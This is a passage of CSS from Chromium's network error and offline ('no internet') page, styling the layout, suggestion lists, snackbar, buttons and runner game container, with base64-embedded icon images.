  [dir='rtl'] button,
  button.small-link,
  .nav-wrapper .secondary-button {
    font-family: Roboto-Regular,Helvetica;
    font-size: .933em;
    margin: 6px 0;
    transform: translatez(0);
  }

  .nav-wrapper {
    box-sizing: border-box;
    padding-bottom: 8px;
    width: 100%;
  }

  #details {
    box-sizing: border-box;
    height: auto;
    margin: 0;
    opacity: 1;
    transition: opacity 250ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  #details.hidden,
  #main-content.hidden {
    height: 0;
    opacity: 0;
    overflow: hidden;
    padding-bottom: 0;
    transition: none;
  }

  h1 {
    font-size: 1.5em;
    margin-bottom: 8px;
  }

  .icon {
    margin-bottom: 5.69vh;
  }

  .interstitial-wrapper {
    box-sizing: border-box;
    margin: 7vh auto 12px;
    padding: 0 24px;
    position: relative;
  }

  .interstitial-wrapper p {
    font-size: .95em;
    line-height: 1.61em;
    margin-top: 8px;
  }

  #main-content {
    margin: 0;
    transition: opacity 100ms cubic-bezier(0.4, 0, 0.2, 1);
  }

  .small-link {
    border: 0;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
    margin: 0;
  }
}

@media (min-width: 421px) and (min-height: 500px) and (max-height: 560px) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

@media (min-height: 400px) and (orientation:portrait) {
  .interstitial-wrapper {
    margin-bottom: 145px;
  }
}

@media (min-height: 299px) {
  .nav-wrapper {
    padding-bottom: 16px;
  }
}

@media (max-height: 560px) and (min-height: 240px) and (orientation:landscape) {
  .extended-reporting-has-checkbox #details {
    padding-bottom: 80px;
  }
}

@media (min-height: 500px) and (max-height: 650px) and (max-width: 414px) and
       (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 7vh;
  }
}

@media (min-height: 650px) and (max-width: 414px) and (orientation: portrait) {
  .interstitial-wrapper {
    margin-top: 10vh;
  }
}

/* Small mobile screens. No fixed nav. */
@media (max-height: 400px) and (orientation: portrait),
       (max-height: 239px) and (orientation: landscape),
       (max-width: 419px) and (max-height: 399px) {
  .interstitial-wrapper {
    display: flex;
    flex-direction: column;
    margin-bottom: 0;
  }

  #details {
    flex: 1 1 auto;
    order: 0;
  }

  #main-content {
    flex: 1 1 auto;
    order: 0;
  }

  .nav-wrapper {
    flex: 0 1 auto;
    margin-top: 8px;
    order: 1;
    padding-inline-end: 0;
    padding-inline-start: 0;
    position: relative;
    width: 100%;
  }

  button,
  .nav-wrapper .secondary-button {
    padding: 16px 24px;
  }

  button.small-link {
    color: var(--google-blue-600);
  }
}

@media (max-width: 239px) and (orientation: portrait) {
  .nav-wrapper {
    padding-inline-end: 0;
    padding-inline-start: 0;
  }
}
</style>
  <style>/* Copyright 2013 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

/* Don't use the main frame div when the error is in a subframe. */
html[subframe] #main-frame-error {
  display: none;
}

/* Don't use the subframe error div when the error is in a main frame. */
html:not([subframe]) #sub-frame-error {
  display: none;
}

h1 {
  margin-top: 0;
  word-wrap: break-word;
}

h1 span {
  font-weight: 500;
}

a {
  text-decoration: none;
}

.icon {
  -webkit-user-select: none;
  display: inline-block;
}

.icon-generic {
  /* Can't access chrome://theme/IDR_ERROR_NETWORK_GENERIC from an untrusted
   * renderer process, so embed the resource manually. */
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAENJREFUeF7tzbEJACEQRNGBLeAasBCza2lLEGx0CxFGG9hBMDDxRy/72O9FMnIFapGylsu1fgoBdkXfUHLrQgdfrlJN1BdYBjQQm3UAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQAQMAAADdiHD7AAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAFJJREFUeF7t0cENgDAMQ9FwYgxG6WjpaIzCCAxQxVggFuDiCvlLOeRdHR9yzjncHVoq3npu+wQUrUuJHylSTmBaespJyJQoObUeyxDQb3bEm5Au81c0pSCD8HYAAAAASUVORK5CYII=) 2x);
}

.icon-offline {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAABIAQMAAABvIyEEAAAABlBMVEUAAABTU1OoaSf/AAAAAXRSTlMAQObYZgAAAGxJREFUeF7tyMEJwkAQRuFf5ipMKxYQiJ3Z2nSwrWwBA0+DQZcdxEOueaePp9+dQZFB7GpUcURSVU66yVNFj6LFICatThZB6r/ko/pbRpUgilY0Cbw5sNmb9txGXUKyuH7eV25x39DtJXUNPQGJtWFV+BT/QAAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJAAAACQBAMAAAAVaP+LAAAAGFBMVEUAAABTU1NNTU1TU1NPT09SUlJSUlJTU1O8B7DEAAAAB3RSTlMAoArVKvVgBuEdKgAAAJ1JREFUeF7t1TEOwyAMQNG0Q6/UE+RMXD9d/tC6womIFSL9P+MnAYOXeTIzMzMzMzMzaz8J9Ri6HoITmuHXhISE8nEh9yxDh55aCEUoTGbbQwjqHwIkRAEiIaG0+0AA9VBMaE89Rogeoww936MQrWdBr4GN/z0IAdQ6nQ/FIpRXDwHcA+JIJcQowQAlFUA0MfQpXLlVQfkzR4igS6ENjknm/wiaGhsAAAAASUVORK5CYII=) 2x);
  position: relative;
}

.icon-disabled {
  content: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHAAAABICAMAAAAZF4G5AAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAASZJREFUeAHd11Fq7jAMRGGf/W/6PoWB67YMqv5DybwG/CFjRuR8JBw3+ByiRjgV9W/TJ31P0tBfC6+cj1haUFXKHmVJo5wP98WwQ0ZCbfUc6LQ6VuUBz31ikADkLMkDrfUC4rR6QGW+gF6rx7NaHWCj1Y/W6lf4L7utvgBSt3rBFSS/XBMPUILcJINHCBWYUfpWn4NBi1ZfudIc3rf6/NGEvEA+AsYTJozmXemjXeLZAov+mnkN2HfzXpMSVQDnGw++57qNJ4D1xitA2sJ+VAWMygSEaYf2mYPTjZfk2K8wmP7HLIH5Mg4/pP+PEcDzUvDMvYbs/2NWwPO5vBdMZE4EE5UTQLiBFDaUlTDPBRoJ9HdAYIkIo06og3BNXtCzy7zA1aXk5x+tJARq63eAygAAAABJRU5ErkJggg==) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOAAAACQAQMAAAArwfVjAAAABlBMVEVMaXFTU1OXUj8tAAAAAXRSTlMAQObYZgAAAYdJREFUeF7F1EFqwzAUBNARAmVj0FZe5QoBH6BX+dn4GlY2PYNzGx/A0CvkCIJuvIraKJKbgBvzf2g62weDGD7CYggpfFReis4J0ey9EGFIiEQQojFSlA9kSIiqd0KkFjKsewgRbStEN19mxUPTtmW9HQ/h6tyqNQ8NlSMZdzyE6qkoE0trVYGFm0n1WYeBhduzwbwBC7voS+vIxfeMjeaiLxsMMtQNwMPtuew+DjzcTHk8YMfDknEcIUOtf2lVfgVH3K4Xv5PRYAXRVMtItIJ3rfaCIVn9DsTH2NxisAVRex2Hh3hX+/mRUR08bAwPEYsI51ZxWH4Q0SpicQRXeyEaIug48FEdegARfMz/tADVsRciwTAxW308ehmC2gLraC+YCbV3QoTZexa+zegAEW5PhhgYfmbvJgcRqngGByOSXdFJcLk2JeDPEN0kxe1JhIt5FiFA+w+ItMELsUyPF2IaJ4aILqb4FbxPwhImwj6JauKgDUCYaxmYIsd4KXdMjIC9ItB5Bn4BNRwsG0XM2nwAAAAASUVORK5CYII=) 2x);
  width: 112px;
}

.hidden {
  display: none;
}

#suggestions-list a {
  color: var(--google-blue-600);
}

#suggestions-list p {
  margin-block-end: 0;
}

#suggestions-list ul {
  margin-top: 0;
}

.single-suggestion {
  list-style-type: none;
  padding-inline-start: 0;
}

#error-information-button {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBmaWxsPSJub25lIiBkPSJNMCAwaDI0djI0SDB6Ii8+PHBhdGggZD0iTTExIDE4aDJ2LTJoLTJ2MnptMS0xNkM2LjQ4IDIgMiA2LjQ4IDIgMTJzNC40OCAxMCAxMCAxMCAxMC00LjQ4IDEwLTEwUzE3LjUyIDIgMTIgMnptMCAxOGMtNC40MSAwLTgtMy41OS04LThzMy41OS04IDgtOCA4IDMuNTkgOCA4LTMuNTkgOC04IDh6bTAtMTRjLTIuMjEgMC00IDEuNzktNCA0aDJjMC0xLjEuOS0yIDItMnMyIC45IDIgMmMwIDItMyAxLjc1LTMgNWgyYzAtMi4yNSAzLTIuNSAzLTUgMC0yLjIxLTEuNzktNC00LTR6Ii8+PC9zdmc+);
  height: 24px;
  vertical-align: -.15em;
  width: 24px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup {
  align-items: center;
  background-color: var(--popup-container-background-color);
  display: flex;
  height: 100%;
  left: 0;
  position: fixed;
  top: 0;
  width: 100%;
  z-index: 100;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-content > p {
  margin-bottom: 11px;
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list ul {
  margin-inline-start: 15px;
}

.use-popup-container#error-information-popup-container
  #error-information-popup-box {
  background-color: var(--background-color);
  left: 5%;
  padding-bottom: 15px;
  padding-top: 15px;
  position: fixed;
  width: 90%;
  z-index: 101;
}

.use-popup-container#error-information-popup-container div.error-code {
  margin-inline-start: 20px;
}

.use-popup-container#error-information-popup-container #suggestions-list p {
  margin-inline-start: 20px;
}

:not(.use-popup-container)#error-information-popup-container
  #error-information-popup-close {
  display: none;
}

#error-information-popup-close {
  margin-bottom: 0;
  margin-inline-end: 35px;
  margin-top: 15px;
  text-align: end;
}

.link-button {
  color: rgb(66, 133, 244);
  display: inline-block;
  font-weight: bold;
  text-transform: uppercase;
}

#sub-frame-error-details {

  color: #8F8F8F;

  /* Not done on mobile for performance reasons. */
  text-shadow: 0 1px 0 rgba(255,255,255,0.3);

}

[jscontent=hostName],
[jscontent=failedUrl] {
  overflow-wrap: break-word;
}

.secondary-button {
  background: #d9d9d9;
  color: #696969;
  margin-inline-end: 16px;
}

.snackbar {
  background: #323232;
  border-radius: 2px;
  bottom: 24px;
  box-sizing: border-box;
  color: #fff;
  font-size: .87em;
  left: 24px;
  max-width: 568px;
  min-width: 288px;
  opacity: 0;
  padding: 16px 24px 12px;
  position: fixed;
  transform: translateY(90px);
  will-change: opacity, transform;
  z-index: 999;
}

.snackbar-show {
  -webkit-animation:
    show-snackbar 250ms cubic-bezier(0, 0, 0.2, 1) forwards,
    hide-snackbar 250ms cubic-bezier(0.4, 0, 1, 1) forwards 5s;
}

@-webkit-keyframes show-snackbar {
  100% {
    opacity: 1;
    transform: translateY(0);
  }
}

@-webkit-keyframes hide-snackbar {
  0% {
    opacity: 1;
    transform: translateY(0);
  }
  100% {
    opacity: 0;
    transform: translateY(90px);
  }
}

.suggestions {
  margin-top: 18px;
}

.suggestion-header {
  font-weight: bold;
  margin-bottom: 4px;
}

.suggestion-body {
  color: #777;
}

/* Decrease padding at low sizes. */
@media (max-width: 640px), (max-height: 640px) {
  h1 {
    margin: 0 0 15px;
  }
  .suggestions {
    margin-top: 10px;
  }
  .suggestion-header {
    margin-bottom: 0;
  }
}

#download-link,
#download-link-clicked {
  margin-bottom: 30px;
  margin-top: 30px;
}

#download-link-clicked {
  color: #BBB;
}

#download-link::before,
#download-link-clicked::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

#download-link-clicked::before {
  opacity: 0;
  width: 0;
}

#offline-content-list-visibility-card {
  border: 1px solid white;
  border-radius: 8px;
  display: flex;
  font-size: .8em;
  justify-content: space-between;
  line-height: 1;
}

#offline-content-list.list-hidden #offline-content-list-visibility-card {
  border-color: rgb(218, 220, 224);
}

#offline-content-list-visibility-card > div {
  padding: 1em;
}

#offline-content-list-title {
  color: var(--google-gray-700);
}

#offline-content-list-show-text,
#offline-content-list-hide-text {
  color: rgb(66, 133, 244);
}

/* Hides the "hide" text div when the offline content list is collapsed/hidden
 * and, alternatively, hides the "show" text div when the offline content list
 * is expanded/shown.
 */
#offline-content-list.list-hidden #offline-content-list-hide-text,
#offline-content-list:not(.list-hidden) #offline-content-list-show-text {
  display: none;
}

/* Controls the animation of the offline content list when it is expanded/shown.
 */
#offline-content-suggestions {
  /* Max-height has to be set for the height animation to work. The chosen value
   * is a little greater than the maximum height the list will have, when all
   * suggestions have images, so that it is never clamped. This makes so that
   * when the actual height is smaller then the animation is not as smooth.
   */
  max-height: 27em;
  transition: max-height 200ms ease-in, visibility 0s 200ms,
              opacity 200ms 200ms linear;
}

/* Controls the animation of the offline content list when it is
 * collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-suggestions {
  max-height: 0;
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms,
              max-height 200ms 200ms ease-out;
  visibility: hidden;
}

#offline-content-list {
  margin-inline-start: -5%;
  width: 110%;
}

/* The selectors below adjust the "overflow" of the suggestion cards contents
 * based on the same screen size based strategy used for the main frame, which
 * is applied by the `interstitial-wrapper` class. */
@media (max-width: 420px)  {
  #offline-content-list {
    margin-inline-start: -2.5%;
    width: 105%;
  }
}
@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  #offline-content-list {
    margin-inline-start: -12px;
    width: calc(100% + 24px);
  }
}

.suggestion-with-image .offline-content-suggestion-thumbnail {
  flex-basis: 8.2em;
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-thumbnail > img {
  height: 100%;
  width: 100%;
}

.suggestion-with-image #offline-content-list:not(.is-rtl)
.offline-content-suggestion-thumbnail > img {
  border-bottom-right-radius: 7px;
  border-top-right-radius: 7px;
}

.suggestion-with-image #offline-content-list.is-rtl
.offline-content-suggestion-thumbnail > img {
  border-bottom-left-radius: 7px;
  border-top-left-radius: 7px;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail {
  align-items: center;
  display: flex;
  justify-content: center;
  min-height: 4.2em;
  min-width: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div {
  align-items: center;
  background-color: rgb(241, 243, 244);
  border-radius: 50%;
  display: flex;
  height: 2.3em;
  justify-content: center;
  width: 2.3em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div > img {
  height: 1.45em;
  width: 1.45em;
}

.offline-content-suggestion-favicon {
  height: 1em;
  margin-inline-end: 0.4em;
  width: 1.4em;
}

.offline-content-suggestion-favicon > img {
  height: 1.4em;
  width: 1.4em;
}

.no-favicon .offline-content-suggestion-favicon {
  display: none;
}

.image-video {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTcgMTAuNVY3YTEgMSAwIDAgMC0xLTFINGExIDEgMCAwIDAtMSAxdjEwYTEgMSAwIDAgMCAxIDFoMTJhMSAxIDAgMCAwIDEtMXYtMy41bDQgNHYtMTFsLTQgNHoiIGZpbGw9IiMzQzQwNDMiLz48L3N2Zz4=);
}

.image-music-note {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTIgM3Y5LjI2Yy0uNS0uMTctMS0uMjYtMS41LS4yNkM4IDEyIDYgMTQgNiAxNi41UzggMjEgMTAuNSAyMXM0LjUtMiA0LjUtNC41VjZoNFYzaC03eiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-earth {
  content: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTIgMmM1LjUyIDAgMTAgNC40OCAxMCAxMHMtNC40OCAxMC0xMCAxMFMyIDE3LjUyIDIgMTIgNi40OCAyIDEyIDJ6TTQgMTJoNC40YzMuNDA3LjAyMiA0LjkyMiAxLjczIDQuNTQzIDUuMTI3SDkuNDg4djIuNDdhOC4wMDQgOC4wMDQgMCAwIDAgMTAuNDk4LTguMDgzQzE5LjMyNyAxMi41MDQgMTguMzMyIDEzIDE3IDEzYy0yLjEzNyAwLTMuMjA2LS45MTYtMy4yMDYtMi43NWgtMy43NDhjLS4yNzQtMi43MjguNjgzLTQuMDkyIDIuODctNC4wOTIgMC0uOTc1LjMyNy0xLjU5Ny44MTEtMS45N0E4LjAwNCA4LjAwNCAwIDAgMCA0IDEyeiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-file {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTMgOVYzLjVMMTguNSA5TTYgMmMtMS4xMSAwLTIgLjg5LTIgMnYxNmEyIDIgMCAwIDAgMiAyaDEyYTIgMiAwIDAgMCAyLTJWOGwtNi02SDZ6IiBmaWxsPSIjM0M0MDQzIi8+PC9zdmc+);
}

.offline-content-suggestion-texts {
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  line-height: 1.3;
  padding: .9em;
  width: 100%;
}

.offline-content-suggestion-title {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 3;
  color: rgb(32, 33, 36);
  display: -webkit-box;
  font-size: 1.1em;
  overflow: hidden;
  text-overflow: ellipsis;
}

div.offline-content-suggestion {
  align-items: stretch;
  border: 1px solid rgb(218, 220, 224);
  border-radius: 8px;
  display: flex;
  justify-content: space-between;
  margin-bottom: .8em;
}

.suggestion-with-image {
  flex-direction: row;
  height: 8.2em;
  max-height: 8.2em;
}

.suggestion-with-icon {
  flex-direction: row-reverse;
  height: 4.2em;
  max-height: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-title {
  -webkit-line-clamp: 1;
  word-break: break-all;
}

.suggestion-with-icon .offline-content-suggestion-texts {
  padding-inline-start: 0;
}

.offline-content-suggestion-attribution-freshness {
  color: rgb(95, 99, 104);
  display: flex;
  font-size: .8em;
  line-height: 1.7em;
}

.offline-content-suggestion-attribution {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 1;
  display: -webkit-box;
  flex-shrink: 1;
  margin-inline-end: 0.3em;
  overflow: hidden;
  overflow-wrap: break-word;
  text-overflow: ellipsis;
  word-break: break-all;
}

.no-attribution .offline-content-suggestion-attribution {
  display: none;
}

.offline-content-suggestion-freshness::before {
  content: '-';
  display: inline-block;
  flex-shrink: 0;
  margin-inline-end: .1em;
  margin-inline-start: .1em;
}

.no-attribution .offline-content-suggestion-freshness::before {
  display: none;
}

.offline-content-suggestion-freshness {
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-pin-spacer {
  flex-grow: 100;
  flex-shrink: 1;
}

.suggestion-with-image .offline-content-suggestion-pin {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCI+PGRlZnM+PHBhdGggaWQ9ImEiIGQ9Ik0wIDBoMjR2MjRIMFYweiIvPjwvZGVmcz48Y2xpcFBhdGggaWQ9ImIiPjx1c2UgeGxpbms6aHJlZj0iI2EiIG92ZXJmbG93PSJ2aXNpYmxlIi8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjYikiIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9zdmc+);
  flex-shrink: 0;
  height: 1.4em;
  margin-inline-start: .4em;
  width: 1.4em;
}

/* Controls the animation (and a bit more) of the launch-downloads-home action
 * button when the offline content list is expanded/shown.
 */
#offline-content-list-action {
  text-align: center;
  transition: visibility 0s 200ms, opacity 200ms 200ms linear;
}

/* Controls the animation of the launch-downloads-home action button when the
 * offline content list is collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-list-action {
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms;
  visibility: hidden;
}

#cancel-save-page-button {
  background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ij48Y2xpcFBhdGggaWQ9Im1hc2siPjxwYXRoIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiM5QUEwQTYiIGQ9Ik0wIDBoMjR2MjRIMHoiLz48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiMxQTczRTgiIHN0eWxlPSJhbmltYXRpb246b2ZmbGluZUFuaW1hdGlvbiA0cyBpbmZpbml0ZSIgZD0iTTAgMGgyNHYyNEgweiIvPjxzdHlsZT5Aa2V5ZnJhbWVzIG9mZmxpbmVBbmltYXRpb257MCUsMzUle2hlaWdodDowfTYwJXtoZWlnaHQ6MTAwJX05MCV7ZmlsbC1vcGFjaXR5OjF9dG97ZmlsbC1vcGFjaXR5OjB9fTwvc3R5bGU+PC9zdmc+);
  background-position: right 27px center;
  background-repeat: no-repeat;
  border: 1px solid var(--google-gray-300);
  border-radius: 5px;
  color: var(--google-gray-700);
  margin-bottom: 26px;
  padding-bottom: 16px;
  padding-inline-end: 88px;
  padding-inline-start: 16px;
  padding-top: 16px;
  text-align: start;
}

html[dir='rtl'] #cancel-save-page-button {
  background-position: left 27px center;
}

#save-page-for-later-button {
  display: flex;
  justify-content: start;
}

#save-page-for-later-button a::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

.hidden#save-page-for-later-button {
  display: none;
}

/* Don't allow overflow when in a subframe. */
html[subframe] body {
  overflow: hidden;
}

#sub-frame-error {
  -webkit-align-items: center;
  -webkit-flex-flow: column;
  -webkit-justify-content: center;
  background-color: #DDD;
  display: -webkit-flex;
  height: 100%;
  left: 0;
  position: absolute;
  text-align: center;
  top: 0;
  transition: background-color 200ms ease-in-out;
  width: 100%;
}

#sub-frame-error:hover {
  background-color: #EEE;
}

#sub-frame-error .icon-generic {
  margin: 0 0 16px;
}

#sub-frame-error-details {
  margin: 0 10px;
  text-align: center;
  visibility: hidden;
}

/* Show details only when hovering. */
#sub-frame-error:hover #sub-frame-error-details {
  visibility: visible;
}

/* If the iframe is too small, always hide the error code. */
/* TODO(mmenke): See if overflow: no-display works better, once supported. */
@media (max-width: 200px), (max-height: 95px) {
  #sub-frame-error-details {
    display: none;
  }
}

/* Adjust icon for small embedded frames in apps. */
@media (max-height: 100px) {
  #sub-frame-error .icon-generic {
    height: auto;
    margin: 0;
    padding-top: 0;
    width: 25px;
  }
}

/* details-button is special; it's a <button> element that looks like a link. */
#details-button {
  box-shadow: none;
  min-width: 0;
}

/* Styles for platform dependent separation of controls and details button. */
.suggested-left > #control-buttons,
.suggested-right > #details-button {
  float: left;
}

.suggested-right > #control-buttons,
.suggested-left > #details-button {
  float: right;
}

.suggested-left .secondary-button {
  margin-inline-end: 0;
  margin-inline-start: 16px;
}

#details-button.singular {
  float: none;
}

/* download-button shows both icon and text. */
#download-button {
  padding-bottom: 4px;
  padding-top: 4px;
  position: relative;
}

#download-button::before {
  background: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArgPxIY1YChsOE/LtBAmpYG0mxpIOSDBpKUo2lpIDZxNJCkHKqlYZAla3RAHQ1DFgAARRroHyLNTwwAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAAAZElEQVRYw+3Ruw3AMAwDUY3OzZUmRRD4E9iim9wNwAdbEURHyk4AAAAATiCVK8lLyPsKeT9K3lsownnunfkPxO78hKiYHxBV8x2icr5BVM+/CMf8g3DN34Rzns6ViwHUAUQ/6wIAd5Km7l6c8AAAAABJRU5ErkJggg==) 2x)
    no-repeat;
  content: '';
  display: inline-block;
  height: 24px;
  margin-inline-end: 4px;
  margin-inline-start: -4px;
  vertical-align: middle;
  width: 24px;
}

#download-button:disabled {
  background: rgb(180, 206, 249);
  color: rgb(255, 255, 255);
}

#buttons::after {
  clear: both;
  content: '';
  display: block;
  width: 100%;
}

/* Offline page */
html[dir='rtl'] .runner-container,
html[dir='rtl'].offline .icon-offline {
  transform: scaleX(-1);
}

.offline {
  transition: filter 1.5s cubic-bezier(0.65, 0.05, 0.36, 1),
              background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);

  will-change: filter, background-color;

}

.offline body {
  transition: background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
}

.offline #main-message > p {
  display: none;
}

.offline.inverted {
  background-color: #fff;
  filter: invert(1);
}

.offline.inverted body {
  background-color: #fff;
}

.offline .interstitial-wrapper {
  color: var(--text-color);
  font-size: 1em;
  line-height: 1.55;
  margin: 0 auto;
  max-width: 600px;
  padding-top: 100px;
  position: relative;
  width: 100%;
}

.offline .runner-container {
  direction: ltr;
  height: 150px;
  max-width: 600px;
  overflow: hidden;
  position: absolute;
  top: 35px;
  width: 44px;
}

.offline .runner-container:focus {
  outline: none;
}

.offline .runner-container:focus-visible {
  outline: 3px solid var(--google-blue-300);
}

.offline .runner-canvas {
  height: 150px;
  max-width: 600px;
  opacity: 1;
  overflow: hidden;
  position: absolute;
  top: 0;
  z-index: 10;
}

.offline .controller {
  height: 100vh;
  left: 0;
  position: absolute;
  top: 0;
  width: 100vw;
  z-index: 9;
}

#offline-resources {
  display: none;
}

#offline-instruction {
  image-rendering: pixelated;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 60px;
  width: fit-content;
}

.offline-runner-live-region {
  bottom: 0;
  clip-path: polygon(0 0, 0 0, 0 0);
  color: var(--background-color);
  display: block;
  font-size: xx-small;
  overflow: hidden;
  position: absolute;
  text-align: center;
  transition: color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
  user-select: none;
}

/* Custom toggle */
.slow-speed-option {
  align-items: center;
  background: var(--google-gray-50);
  border-radius: 24px/50%;
  bottom: 0;
  color: var(--error-code-color);
  display: inline-flex;
  font-size: 1em;
  left: 0;
  line-height: 1.1em;
  margin: 5px auto;
  padding: 2px 12px 3px 20px;
  position: absolute;
  right: 0;
  width: max-content;
  z-index: 999;
}

.slow-speed-option.hidden {
  display: none;
}

.slow-speed-option [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle {
  cursor: pointer;
  margin-inline-start: 8px;
  padding: 8px 4px;
  position: relative;
}

.slow-speed-option [type=checkbox]:disabled ~ .slow-speed-toggle {
  cursor: default;
}

.slow-speed-option-label [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option .slow-speed-toggle::after {
  content: '';
  display: block;
  margin: 0 3px;
  transition: all 100ms cubic-bezier(0.4, 0, 1, 1);
}

.slow-speed-option .slow-speed-toggle::before {
